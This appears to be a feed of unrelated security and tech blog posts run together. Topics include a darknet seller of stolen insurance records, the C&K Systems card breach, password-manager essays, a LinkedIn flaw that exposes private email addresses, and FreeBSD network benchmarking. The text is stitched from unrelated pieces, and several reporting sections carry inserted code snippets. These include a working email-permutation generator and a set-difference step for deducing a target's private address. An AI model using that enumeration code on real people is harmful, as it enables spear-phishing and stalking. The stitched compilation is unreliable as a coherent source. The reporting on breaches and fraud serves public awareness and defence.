The “Fraud Related” section of the Evolution Market.
Purloined medical records are among the many illicit goods for sale on the Evolution Market, a black market bazaar that traffics mostly in narcotics and fraud-related goods — including plenty of stolen financial data. Evolution cannot be reached from the regular Internet. Rather, visitors can only browse the site using Tor, software that helps users disguise their identity by bouncing their traffic between different servers, and by encrypting that traffic at every hop along the way.

Last week, a reader alerted this author to a merchant on Evolution Market nicknamed “ImperialRussia” who was advertising medical records for sale. ImperialRussia was hawking his goods as “fullz” — street slang for a package of all the personal and financial records that thieves would need to fraudulently open up new lines of credit in a person’s name.

Each document for sale by this seller includes the would-be identity theft victim’s name, their medical history, address, phone and driver license number, Social Security number, date of birth, bank name, routing number and checking/savings account number. Customers can purchase the records using the digital currency Bitcoin.

A set of five fullz retails for $40 ($8 per record). Buy 20 fullz and the price drops to $7 per record. Purchase 50 or more fullz, and the per record cost falls to just $6.40 — roughly the price of a value meal at a fast food restaurant. Incidentally, even at $8 per record, that’s cheaper than the price most stolen credit cards fetch on the underground markets.

Imperial Russia’s ad pimping medical and financial records stolen from a Texas life insurance firm.
“Live and Exclusive database of US FULLZ from an insurance company, particularly from NorthWestern region of U.S.,” ImperialRussia’s ad on Evolution enthuses. The pitch continues:

“Most of the fullz come with EXTRA FREEBIES inside as additional policyholders. All of the information is accurate and confirmed. Clients are from an insurance company database with GOOD to EXCELLENT credit score! I, myself was able to apply for credit cards valued from $2,000 – $10,000 with my fullz. Info can be used to apply for loans, credit cards, lines of credit, bank withdrawal, assume identity, account takeover.”

Sure enough, the source who alerted me to this listing had obtained numerous fullz from this seller. All of them contained the personal and financial information on people in the Northwest United States (mostly in Washington state) who’d applied for life insurance through American Income Life, an insurance firm based in Waco, Texas.



American Income Life referred all calls to the company’s parent firm — Torchmark Corp., an insurance holding company in McKinney, Texas. This publication shared with Torchmark the records obtained from Imperial Russia. In response, Michael Majors, vice president of investor relations at Torchmark, said that the FBI and Secret Service were assisting the company in an ongoing investigation, and that Torchmark expected to begin the process of notifying affected consumers this week.

“We’re aware of the matter and we’ve been working with law enforcement on an ongoing investigation,” Majors said, after reviewing the documents shared by KrebsOnSecurity. “It looks like we’re working on the same matter that you’re inquiring about.”

Majors declined to answer additional questions, such as whether Torchmark has uncovered the source of the data breach and stopped the leakage of customer records, or when the company believes the breach began. Interestingly, ImperialRussia’s first post offering this data is dated more than three months ago, on June 15, 2014. Likewise, the insurance application documents shared with Torchmark by this publication also were dated mid-2014.

The financial information in the stolen life insurance applications includes the checking and/or savings account information of the applicant, and is collected so that American Income can pre-authorize payments and automatic monthly debits in the event the policy is approved. In a four-page discussion thread on ImperialRussia’s sales page at Evolution, buyers of this stolen data took turns discussing the quality of the information and its various uses, such as how one can use automated phone systems to verify the available balance of an applicant’s bank account.

Jessica Johnson, a Washington state resident whose records were among those sold by ImperialRussia, said in a phone interview that she received a call from a credit bureau this week after identity thieves tried to open two new lines of credit in her name.

“It’s been a nightmare,” she said. “Yesterday, I had all these phone calls from the credit bureau because someone tried to open two new credit cards in my name. And the only reason they called me was because I already had a credit card with that company and the company thought it was weird, I guess.”

ImperialRussia discusses his wares with potential and previous buyers.
More than 1.8 million people were victims of medical ID theft in 2013, according to a report from the Ponemon Institute, an independent research group. I suspect that many of these folks had their medical records stolen and used to open new lines of credit in their names, or to conduct tax refund fraud with the Internal Revenue Service (IRS).

Placing a fraud alert or freeze on your credit file is a great way to block identity thieves from hijacking your good name. For pointers on how to do that, as well as other tips on how to avoid becoming a victim of ID theft, check out this story.


Adobe has released a security update for its Acrobat and PDF Reader products that fixes at least eight critical vulnerabilities in Mac and Windows versions of the software. If you use either of these programs, please take a minute to update now.

Users can manually check for updates by choosing Help > Check for Updates. Adobe Reader users on Windows also can get the latest version here; Mac users, here.

Adobe said it is not aware of exploits or active attacks in the wild against any of the flaws addressed in this update. More information about the patch is available at this link.

For those seeking a lightweight, free alternative to Adobe Reader, check out Sumatra PDF. Foxit Reader is another popular alternative, although it seems to have become less lightweight in recent years.


C&K Systems Inc., a third-party payment vendor blamed for a credit and debit card breach at more than 330 Goodwill locations nationwide, disclosed this week that the intrusion lasted more than 18 months and has impacted at least two other organizations.

On July 21, 2014, this site broke the news that multiple banks were reporting indications that Goodwill Industries had suffered an apparent breach that led to the theft of customer credit and debit card data. Goodwill later confirmed that the breach impacted a portion of its stores, but blamed the incident on an unnamed “third-party vendor.”

Last week, KrebsOnSecurity obtained some internal talking points apparently sent by Goodwill to prepare its member organizations to respond to any calls from the news media about the incident. Those talking points identified the breached third-party vendor as C&K Systems, a retail point-of-sale operator based in Murrells Inlet, S.C.

In response to inquiries from this reporter, C&K released a statement acknowledging that it was informed on July 30 by “an independent security analyst” that its “hosted managed services environment may have experienced unauthorized access.” The company says it then hired an independent cyber investigative team and alerted law enforcement about the incident.

C&K says the investigation determined malicious hackers had access to its systems “intermittently” between Feb. 10, 2013 and Aug. 14, 2014, and that the intrusion led to the installation of a “highly specialized point of sale (POS) infostealer.rawpos malware variant that was undetectable by our security software systems until Sept. 5, 2014,” [link added].

Their statement continues:

“This unauthorized access currently is known to have affected only three (3) customers of C&K, including Goodwill Industries International. While many payment cards may have been compromised, the number of these cards of which we are informed have been used fraudulently is currently less than 25.”

C&K Systems’ full statement is posted here.

ANALYSIS

C&K Systems has declined to answer direct questions about this breach. As such, it remains unclear exactly how its systems were compromised, information that could no doubt help other organizations prevent future breaches. It’s also not clear whether the other two organizations impacted by this breach have disclosed it or plan to.

Here are a few thoughts about why we may not have heard about those other two breaches, and why the source of card breaches can very often go unreported.

Point-of-sale malware, like the malware that hit C&K as well as Target, Home Depot, Neiman Marcus and other retailers this past year, is designed to steal the data encoded onto the magnetic stripe on the backs of debit and credit cards. This data can be used to create counterfeit cards, which are then typically used to purchase physical goods at big-box retailers.

The magnetic stripe on a credit or debit card contains several areas, or “tracks,” where cardholder information is stored: “Track 1” includes the cardholder’s name, account number and other data. “Track 2” contains the cardholder’s account number, encrypted PIN and other information, but it does not include the account holder’s name.

An example of Track 1 and Track 2 data, together. Source: Appsecconsulting.com
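For readers unfamiliar with the layout, the sketch below parses a synthetic Track 2 string following the publicly documented ISO/IEC 7813 convention (start sentinel `;`, PAN, `=`, expiry, service code, discretionary data, end sentinel `?`). The PAN here is a made-up test number, not real card data, and the field names are from the standard, not from anything recovered in these breaches:

```python
import re

# Synthetic Track 2 data for illustration only; this PAN is a test number.
TRACK2 = ";4111111111111111=25121015432112345678?"

def parse_track2(raw):
    """Split a Track 2 string into its fields (sketch, not production code)."""
    m = re.match(r"^;(\d{1,19})=(\d{2})(\d{2})(\d{3})(\d*)\?$", raw)
    if not m:
        raise ValueError("not a valid Track 2 string")
    pan, yy, mm, service_code, discretionary = m.groups()
    return {
        "pan": pan,                      # primary account number
        "expiry": f"20{yy}-{mm}",        # stored as YYMM on the stripe
        "service_code": service_code,
        "discretionary": discretionary,  # issuer data, e.g. PIN verification value
    }

fields = parse_track2(TRACK2)
print(fields["pan"], fields["expiry"])
```

Note that nothing in Track 2 identifies the cardholder by name, which is exactly why its theft so often falls outside state notification laws.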
Most U.S. states have data breach laws requiring businesses that experience a breach involving the personal and financial information of their citizens to notify those individuals in a timely fashion. However, few of those notification requirements are triggered unless the data that is lost or stolen includes the consumer’s name (see my reporting on the 2012 breach at Global Payments, e.g.).

This is important because a great many of the underground stores that sell stolen credit and debit data only sell Track 2 data. Translation: If the thieves are only stealing Track 2 data, a breached business may not have an obligation under existing state data breach disclosure laws to notify consumers about a security incident that resulted in the theft of their card data.

ENCRYPTION, ENCRYPTION, ENCRYPTION

Breaches like the one at C&K Systems involving stolen mag stripe data will continue for several years to come, even beyond the much-ballyhooed October 2015 liability shift deadline from Visa and MasterCard.

Much of the retail community is working to meet an October 2015 deadline put in place by MasterCard and Visa to move to chip-and-PIN enabled card terminals at their checkout lanes (in most cases, however, this transition will involve the less-secure chip-and-signature approach). Somewhat embarrassingly, the United States is the last of the G20 nations to adopt this technology, which embeds a small computer chip in each card that makes it much more expensive and difficult (but not impossible) for fraudsters to clone stolen cards.

That October 2015 deadline comes with a shift in liability for merchants who haven’t yet adopted chip-and-PIN (i.e., those merchants not in compliance could find themselves responsible for all of the fraudulent charges on purchases involving chip-enabled cards that were instead merely swiped through a regular mag-stripe card reader at checkout time).

Business Week recently ran a story pointing out that Home Depot’s in-store payment system “wasn’t set up to encrypt customers’ credit- and debit-card data, a gap in its defenses that gave potential hackers a wider window to exploit.” The story observed that although Home Depot “this year purchased a tool that would encrypt customer-payment data at the cash register, two of the former managers say current Home Depot staffers have told them that the installation isn’t complete.”

The crazy aspect of all these breaches over the past year is that we’re only hearing about those intrusions that have been detected. In an era when third-party vendors such as C&K Systems can go 18 months without detecting a break-in, it’s reasonable to assume that the problem is much worse than it seems.

Avivah Litan, a fraud analyst with Gartner Inc., said that at least with stolen credit card data there are mechanisms for banks to report a suspected breached merchant to the card associations. At that point, Visa and MasterCard will aggregate the reports to the suspected breached merchant’s bank, and request that the bank demand that the merchant hire a security firm to investigate. But in the case of breaches involving more personal data — such as Social Security numbers and medical information — very often there are few such triggers, and little recourse for affected consumers.

“It’s usually only the credit and debit card stuff that gets exposed,” Litan said. “Nobody cares if the more sensitive personal data is stolen because nobody is damaged by that except you as the consumer, and anyway you probably won’t have any idea how that data was stolen in the first place.”

Maybe it’s best that most breaches go undisclosed: It’s not clear how much consumers could stand if they knew about them all. In an opinion piece published today, New York Times writer Joe Nocera observed that “seven years have passed between the huge T.J. Maxx breach and the huge Home Depot breach — and nothing has changed.” Nocera asks: “Have we become resigned to the idea that, as a condition of modern life, our personal financial data will be hacked on a regular basis? It is sure starting to seem that way.” Breach fatigue, indeed.

The other observation I’d make about these card breaches is that the entire credit card system in the United States seems currently set up so that one party to a transaction can reliably transfer the blame for an incident to another. The main reason the United States has not yet moved to a more secure standard for handling cards, for example, has a lot to do with the finger pointing and blame game that’s been going on for years between the banks and the retail industry. The banks have said, “If the retailers only started installing chip-and-PIN card readers, we’d start issuing those types of cards.” The retailers respond: “Why should we spend the money upgrading all our payment terminals to handle chip-and-PIN when hardly any banks are issuing those types of cards?” And so it has gone for years.

For its part, C&K Systems says it was relying on hardware and software that met current security industry standards but was nevertheless deficient. Happily, the company reports that it is in the process of implementing point-to-point encryption to block any future attacks on its payment infrastructure.

“What we have learned during this process is that we rely and put our trust in many systems and individuals to help prevent these kinds of things from happening. However, there is no 100% failsafe security solution for hosting Point of Sale environments,” C&K Systems said. Their statement continues:

“The software we host for our customers is from a leading POS company and meets current PCI-DSS requirements of encrypted data in transit and data at rest. Point of sale terminals are vulnerable to memory scraping malware, which catches cards in memory before encryption can occur. Our software vendor is in the process of rolling out a full P2PE solution with tokenization that we anticipate receiving in October 2014. Our experience with the state of today’s threats will help all current and future customers develop tighter security measures to help reduce threat exposure and to make them more cognizant of the APTs that exist today and the impact of the potential threat to their businesses.”

Too many organizations only get religion about security after they’ve had a serious security breach, and unfortunately that inaction usually ends up costing the consumer more in the long run. But that doesn’t mean you have to be further victimized in the process: Be smart about your financial habits.

Using a credit card over a debit card, for example, involves fewer hassles and risks when your card information inevitably gets breached by some merchant. Pay close attention to your monthly statements and report any unauthorized charges immediately. And spend more time and energy protecting yourself from identity theft. Finally, take proactive steps to keep your inbox and your computer from being ravaged by cybercrooks.


The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.13, the “Joachim Fuchsberger” release. This release fixes multiple security vulnerabilities; all users of affected phpMyFAQ versions are encouraged to upgrade to this latest version as soon as possible! A detailed security advisory is available. We also added SQLite3 support, backported from phpMyFAQ 2.9. […]


You probably noticed that in the (frequent) posts about security and passwords lately, I keep suggesting LastPass as a password manager. It’s the manager I use myself, and the reasons I settled on it are multi-faceted, but essentially I’m suggesting you use a tool that does not make proper password hygiene more inconvenient. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, things get difficult and you’ll just decide to use the same password over and over.

Or you’ll use a method for having “unique” passwords that are actually composed of a fixed part and a variable one (which is what I used for the longest time). And let’s be clear: using the same base password suffixed with the name of the site you’re signing up for is no protection at all, the moment more than one of your passwords is discovered.

So, convenience being important (because inconvenience just leads to bad security hygiene), LastPass delivers what I need: it has autofill, so I don’t have to open a terminal and run sgeps (as I used to) to get the password out of the store; it generates passwords in the browser, so I don’t have to open a terminal and run pwgen; it runs on my cellphone, so I can use it to fetch a password to type somewhere else; and it even auto-fills my passwords in Android apps, so I don’t have to use a simple password when dealing with some random website that then matches to an app on my phone. But it also has a few good “security conveniences”: you can re-encrypt your vault with a new master password, you can protect it further with a proper OTP pad or a 2FA device, and there are extras such as letting you know if an email address you use across services is involved in an account breach.

This does not mean there are no other good password management tools; I know the names of plenty. But I just looked for one that had the features I cared about, and I went with it. I’m happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don’t think that merely being open source would earn a tool more of my trust. Being open source and audited for a long time, sure, but either way it’s not a dealbreaker for me. I mean, Chrome itself has a password manager; it just doesn’t feel suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get at that data.

But the interesting part is how quickly geeks will suggest rolling your own, be it using some open-source password manager, requiring an external sync system (I did that with sgeps, but it’s tied to a single GPG key, so it’s not easy for me to use two different hardware smartcards), or even your own sync infrastructure. And this is the answer I really can’t stand, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it’s even worse than that: it’s hypocritical.

Roll-your-own or host-your-own are, first of all, not options for people who have no intention of learning how computer systems work — and I can’t blame them: I don’t want to know how my fridge or dishwasher works, I just want it to work. People don’t care to learn that you can get file A onto computer B, but that if you then change it on both while offline you’ll get a collision, and lose one of the two changes. They either have no time, no interest, or (though I don’t think that happens often) no skill to understand that. And it’s not just the random young adult who ends up registering on xtube with no idea what that means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it’s more important to consider the number of people who think they have the skills and the time, and then turn out to lack one or both. Who do you think can protect your content (and passwords) better: a big company with entire teams dedicated to security, or an average 16-year-old who thinks he can run the website’s forum? The reference here is to myself: back in 2000/2001 I was the forum admin for an Italian gaming community. We got hacked, multiple times, and each time was a fresh lesson for me in what security means. At the time third-party forum hosting was reserved for paying customers, and the results were probably terrible. My personal admin password matched one of my email addresses up until last week, and I know for a fact that at least one group of people got access to the password database, where passwords were stored in plain text.

Yes, it is true that targets such as Adobe will yield many more valid email addresses and password hashes than your average forum, but as the “fake” 5M accounts should have shown you, targeting enough small fish can lead to much the same result, if not a better one: you may get lucky and stumble across two passwords for the same account, which lets you defeat the similar-but-different passwords strategy mentioned above. Indeed, as I noted in my previous post, Comic Book Database admitted to being the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites involved, such as MythTV Talk or PoliceAuctions.com, have made no such statement either.

This is not just a matter of the security of the code itself, so the “many eyes” answer does not apply. It is entirely possible to screw up with an open source program as well, if it’s misconfigured, or if a vulnerable version doesn’t get updated in time because the admin has no time. You see that constantly with WordPress and its security issues. Indeed, the reason I don’t migrate my blog to WordPress is that I would never have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.


One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing.

LinkedIn has built much of its considerable worth on the age-old maxim that “it’s all about who you know.” As a LinkedIn user, you can directly connect with those you attest to knowing professionally or personally, but also you can ask to be introduced to someone you’d like to meet by sending a request through someone who bridges your separate social networks. Celebrities, executives or any other LinkedIn users who wish to avoid unsolicited contact requests may do so by selecting an option that forces the requesting party to supply the personal email address of the intended recipient.

LinkedIn’s entire social fabric begins to unravel if any user can directly connect to any other user, regardless of whether or how their social or professional circles overlap. Unfortunately for LinkedIn (and its users who wish to have their email addresses kept private), this is the exact risk introduced by the company’s built-in efforts to expand the social network’s user base.

According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users.

LinkedIn assumes that if an email address is in your contacts list, that you must already know this person. But what if your entire reason for signing up with LinkedIn is to discover the private email addresses of famous people? All you’d need to do is populate your email account’s contacts list with hundreds of permutations of famous peoples’ names — including combinations of last names, first names and initials — in front of @gmail.com, @yahoo.com, @hotmail.com, etc. With any luck and some imagination, you may well be on your way to an A-list LinkedIn friends list (or a fantastic set of addresses for spear-phishing, stalking, etc.).
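The article later notes the researchers did exactly this with an Excel macro; the permutation step is trivial in any language. A hedged sketch (the name, patterns and domains are invented for illustration) of how a few naming patterns multiply into a contact list:

```python
from itertools import product

# Hypothetical target name and free-mail domains, per the attack described above.
first, last = "mark", "cuban"
domains = ["gmail.com", "yahoo.com", "hotmail.com"]

# A handful of common mailbox naming patterns (f0/l0 are first initials).
patterns = [
    "{f}{l}", "{f}.{l}", "{f}_{l}", "{l}{f}",
    "{f0}{l}", "{f}{l0}", "{f0}.{l}",
]

# Expand every pattern against every domain into a de-duplicated guess list.
guesses = sorted({
    p.format(f=first, l=last, f0=first[0], l0=last[0]) + "@" + d
    for p, d in product(patterns, domains)
})
print(len(guesses))  # 21 candidate addresses from just seven patterns
```

Scale the pattern list into the hundreds and you have the contacts file the researchers describe.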

LinkedIn lets you know which of your contacts aren’t members.
When you import your list of contacts from a third-party service or from a stand-alone file, LinkedIn will show you any profiles that match addresses in your contacts list. More significantly, LinkedIn helpfully tells you which email addresses in your contacts lists are not LinkedIn users.

It’s that last step that’s key to finding the email address of the targeted user to whom LinkedIn has just sent a connection request on your behalf. The service doesn’t explicitly tell you that person’s email address, but by comparing your email account’s contact list to the list of addresses that LinkedIn says don’t belong to any users, you can quickly figure out which address(es) on the contacts list correspond to the user(s) you’re trying to find.
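The deduction step above is nothing more than a set difference. A minimal sketch, with entirely hypothetical addresses standing in for the uploaded contacts and LinkedIn’s “not a member” response:

```python
# Addresses the attacker uploaded as "contacts" (hypothetical).
uploaded = {"m.cuban@gmail.com", "mark.cuban@gmail.com", "mcuban@yahoo.com"}

# Addresses the service reported as NOT belonging to any member (hypothetical).
not_members = {"m.cuban@gmail.com", "mcuban@yahoo.com"}

# Whatever remains must belong to existing users -- i.e., the target.
likely_hits = uploaded - not_members
print(likely_hits)
```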

Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information. Last month, the two researchers detailed how they were able to de-anonymize posts to Secret, an app-driven online service that allows people to share messages anonymously within their circle of friends, friends of friends, and publicly. In February, Seely more famously demonstrated how to use Google Maps to intercept FBI and Secret Service phone calls.

This time around, the researchers picked on Dallas Mavericks owner Mark Cuban to prove their point with LinkedIn. Using their low-tech hack, the duo was able to locate the Webmail address Cuban had used to sign up for LinkedIn. Seely said they had success locating the email addresses of other celebrities using the same method about nine times out of ten.

“We created several hundred possible addresses for Cuban in a few seconds, using a Microsoft Excel macro,” Seely said. “It’s just a brute-force guessing game, but 90 percent of people are going to use an email address that includes components of their real name.”

The Rhino guys really wanted Cuban’s help in spreading the word about what they’d found, but instead of messaging Cuban directly, Seely pursued a more subtle approach: He knew Cuban’s latest start-up was Cyber Dust, a chat messenger app designed to keep your messages private. So, Seely fired off a tweet complaining that “Facebook Messenger crosses all privacy lines,” and that as a result he was switching to Cyber Dust.

When Mark Cuban retweeted Seely’s endorsement of Cyber Dust, Seely reached out to Cyber Dust CEO Ryan Ozonian, letting him know that he’d discovered Cuban’s email address on LinkedIn. In short order, Cuban was asking Rhino to test the security of Cyber Dust.

“Fortunately no major faults were found and those he found are already fixed in the coming update,” Cuban said in an email exchange with KrebsOnSecurity. “I like working with them. They look to help rather than exploit.. We have learned from them and I think their experience will be valuable to other app publishers and networks as well.”

Cory Scott, director of information security at LinkedIn, said very few of the company’s members opt in to the requirement that all new potential contacts supply the invitee’s email address before sending an invitation to connect. He added that email address-to-user mapping is a fairly common design pattern, that it is not particularly unique to LinkedIn, and that nothing the company does will prevent people from blasting emails to lists of addresses that might belong to a targeted user, hoping that one of them will hit home.

“Email address permutators, of which there are many of them on the ‘Net, have existed much longer than LinkedIn, and you can blast an email to all of them, knowing that most likely one of those will hit your target,” Scott said. “This is kind of one of those challenges that all social media companies face in trying to prevent the abuse of [site] functionality. We have rate limiting, scoring and abuse detection mechanisms to prevent frequent abusers of this service, and to make sure that people can’t validate spam lists.”
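Scott doesn’t say how LinkedIn’s rate limiting works, but the generic mechanism he alludes to can be sketched as a toy token bucket (all parameters here are invented, not LinkedIn’s):

```python
import time

# Toy per-user token-bucket limiter for, say, contact-import requests.
class TokenBucket:
    def __init__(self, rate, capacity):
        self.rate = rate          # tokens replenished per second
        self.capacity = capacity  # maximum burst size
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self):
        # Refill proportionally to elapsed time, capped at capacity.
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(rate=1.0, capacity=5)
results = [bucket.allow() for _ in range(10)]
print(results.count(True))  # the burst passes, rapid repeats are throttled
```

A scoring system would layer on top of this, weighting how “list-like” the imported contacts look.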

In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses.

“We are in the process of implementing two short-term changes and one longer term change to give our members more control over this feature,” LinkedIn spokeswoman Nicole Leverich wrote in an emailed statement. “In the next few weeks, we are introducing new logic models designed to prevent hackers from abusing this feature. In addition, we are making it possible for members to ask us to opt out of being discoverable through this feature. In the longer term, we are looking into creating an opt-out box that members can choose to select to not be discoverable using this feature.”


The first BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


When I posted my previous post about accounts on Google+, I received a very interesting suggestion that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really needs is a way to learn a site's password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications for fixed-path files that describe site parameters, such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. In the same spirit, one could add a new password-policy.txt file defining some parameters of the website's password policy.

Things like the minimum and maximum length of the password, which characters are allowed, and whether it is case sensitive or not. This is important information that every password manager needs to know, and as I said, not all websites make it clear to the user either. I'll recount two different horror stories, one from the past and one more recent, that show why it matters.

The first story is from almost ten years ago. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my password pattern. Anyway, I liked the idea of having a long password. I signed up, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box; no, I don't want to comment further on that.

What happened is that the moment I tried to set up mail fetching in GMail, it kept failing authentication. And I was sure I was using the right password, the one I had insisted on using up to that point! I could log in on the website just fine with it, so what gave? A quick check of the password my browser (I think Firefox at the time) had stored for that website showed me the truth: the password I had been using to log in did not match the one I tried to use from GMail: the last character was missing. Some further inspection of the postal service website showed that the password fields, both on the password-change and login pages (and, I assumed at the time, the registration page, for obvious reasons), set a maxlength of 10. So as long as I typed or pasted the password into the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to log in out of band (through POP3) I used the password as I intended it, and failed.
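This failure mode is easy to reproduce: a password field with a maxlength silently drops anything typed or pasted beyond the limit, with no warning at all. A minimal illustration (not the actual postal service markup):

```html
<!-- Minimal reproduction of the silent-truncation problem described above. -->
<form action="/login" method="post">
  <!-- Typing or pasting an 11-character password here submits only
       the first 10 characters; the browser gives no indication. -->
  <input type="password" name="password" maxlength="10">
  <input type="submit" value="Log in">
</form>
```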

A similar, more recent story happened with LastMinute. I went to change my password during my recent spree of updating all my passwords, even for unused accounts (mostly to make sure they don't get leaked and let people do crazy stuff to me). My default password generator on LastPass is set to generate 32-character passwords. But that did not work for LastMinute, or rather, it only appeared to. It let me change my password just fine, but when I tried logging back in, it did not work. (Yes, this is why I try to log back in right after generating a password; I've seen this happen before.) In this case, the problem was the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful include the allowed symbols: I have found that sometimes I need to generate a number of passwords until I find one that avoids the disallowed symbols while still containing some, or give up on symbols altogether and ask LastPass to generate only letters and numbers. Or a way to indicate whether the password is case sensitive, because if it is not, what I do is disable the generation of one set of letters, so that the rest is randomised better.
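Pulling these parameters together, a password-policy.txt might look something like this; to be clear, this is a hypothetical sketch with invented field names, since no such standard exists:

```
# /password-policy.txt (hypothetical format)
min-length: 8
max-length: 64
case-sensitive: yes
allowed-symbols: !@#$%^&*-_
```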

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that bugs.gentoo.org and forums.gentoo.org are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course, if you were simply to declare that your website uses the same password as, say, google.com, you'd have a problem. What you need is a reciprocal indication that both sites consider the other equivalent, basically by serving the same identical file. This makes the implementation a bit more complex, but it should not be too difficult, as those kinds of sites tend to at least share a robots.txt (okay, not in Amazon's case), so distributing one more file should not be hard.

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?


I think it's about time I shared some more details about the RSS stuff going into FreeBSD and how I'm testing it.

For now I'm focusing on IPv4 + UDP on the Intel 10GE NICs. The TCP side of things is done (and the IPv6 side of things works too!) but enough of the performance walls show up in the IPv4 UDP case that it's worth sticking to it for now.

I'm testing on a pair of 4-core boxes at home. They're not special - and they're very specifically not trying to be server-class hardware. I'd like to see where these bottlenecks are even at low core count.

The test setup in question:

Testing software:

  • http://github.com/erikarn/freebsd-rss
  • It requires libevent2 - an updated copy; previous versions of libevent2 didn't handle FreeBSD-specific errors gracefully and would error out of the IO loop early.

Server:

  • CPU: Intel(R) Core(TM) i5-3550 CPU @ 3.30GHz (3292.59-MHz K8-class CPU)
  • There's no SMT/HTT, but I've disabled it in the BIOS just to be sure
  • 4GB RAM
  • FreeBSD-HEAD, amd64
  • NIC: 82599EB 10-Gigabit SFI/SFP+ Network Connection
  • ix0: 10.11.2.1/24
/etc/sysctl.conf:

# for now redirect processing just makes the lock overhead suck even more.
# disable it.
net.inet.ip.redirect=0
net.inet.icmp.drop_redirect=1
/boot/loader.conf:

hw.ix.num_queues=8

# experiment with deferred dispatch for RSS
net.isr.numthreads=4
net.isr.maxthreads=4
net.isr.bindthreads=1
 
kernel config:

include GENERIC
ident HACKBOX

device netmap
options RSS
options PCBGROUP

# in-system lock profiling
options LOCK_PROFILING

# Flowtable - the rtentry locking is a bit .. slow.
options   FLOWTABLE

# This debugging code has too much overhead to do accurate
# testing with.
nooptions         INVARIANTS
nooptions         INVARIANT_SUPPORT
nooptions         WITNESS
nooptions         WITNESS_SKIPSPIN

The server runs the "rss-udp-srv" process, which behaves like a multi-threaded UDP echo server on port 8080.

Client

The client box is slightly more powerful to compensate for (currently) not using completely affinity-aware RSS UDP transmit code.

  • CPU: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz (3192.68-MHz K8-class CPU)
  • SMT/HTT: Disabled in BIOS
  • 8GB RAM
  • FreeBSD-HEAD amd64
  • Same kernel config, loader and sysctl config as the server
  • ix0: configured as 10.11.2.2/24, 10.11.2.3/32, 10.11.2.4/32, 10.11.2.32/32, 10.11.2.33/32
The client runs 'udp-clt' programs to source and sink traffic to the server.

Running things

The server-side simply runs the listen server, configured to respond to each frame:

$ rss-udp-srv 1 10.11.2.1

The client side runs four instances of udp-clt, each from a different IP address. These are run in parallel (I run them in different screens, so I can quickly see what's going on):

$ ./udp-clt -l 10.11.2.3 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.4 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.32 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.33 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510

The IP addresses are chosen so that the 2-tuple Toeplitz hash, using the default Microsoft key, hashes each flow to a different RSS bucket, each of which lives on an individual CPU.

Results: Round one

When the server is responding to each frame, the following occurs. The numbers are: "number of frames generated by the client (netstat)", "number of frames received by the server (netstat)", "number of frames seen by rss-udp-srv", "number of responses transmitted by rss-udp-srv", "number of frames transmitted by the server (netstat)"
  • 1 udp-clt process: 710,000; 710,000; 296,000; 283,000; 281,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 592,000; 592,000; 575,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 636,000; 636,000; 600,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 255,000; 255,000; 255,000
So, it's not actually linear past two cores. The question here is: why?

There are a couple of parts to this.

Firstly - I had left turbo boost on. What this translated to:

  • One core active: ~ 30% increase in clock speed
  • Two cores active: ~ 30% increase in clock speed
  • Three cores active: ~ 25% increase in clock speed
  • Four cores active: ~ 15% increase in clock speed.
Secondly and more importantly - I had left flow control enabled. This made a world of difference.
